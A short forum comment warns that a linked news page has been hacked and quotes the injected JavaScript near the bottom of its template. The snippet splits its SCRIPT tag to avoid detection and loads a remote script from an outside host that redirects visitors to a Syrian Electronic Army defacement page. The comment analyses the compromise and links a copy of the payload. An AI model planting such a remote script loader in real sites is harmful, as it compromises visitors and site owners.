Generally not a good idea to link directly to a hacked page.<p>There's a bit of code injected into the page near the bottom:<p><pre><code> document.write("<SCR"+"IPT TYPE='text/javascript' SRC='" + "http" + (window.location.protocol.indexOf('https:')==0?'s':'') + "://js.revsci.net/gateway/gw.js?csid=I07714' CHARSET='ISO-8859-1'"+"><\/SCR"+"IPT>");
</code></pre>
js.revsci.net seems to be redirecting some requests to localhost, so the code isn't loading for everyone. If it loads for you, you get redirected to a big "hacked by the Syrian Electronic Army etc. etc." page.<p>The location of the code doesn't look like it was from a malicious ad or social media thingy. Looks like it's near the bottom of the page template, so that's neat. It's embedded in other unrelated articles too.<p>edit: I was able to retrieve the content from elsewhere. It's up at <a href="http://pastebin.com/rzPeKKMH" rel="nofollow">http://pastebin.com/rzPeKKMH</a> -- it's not just doing a redirect, there's some funky stuff in there.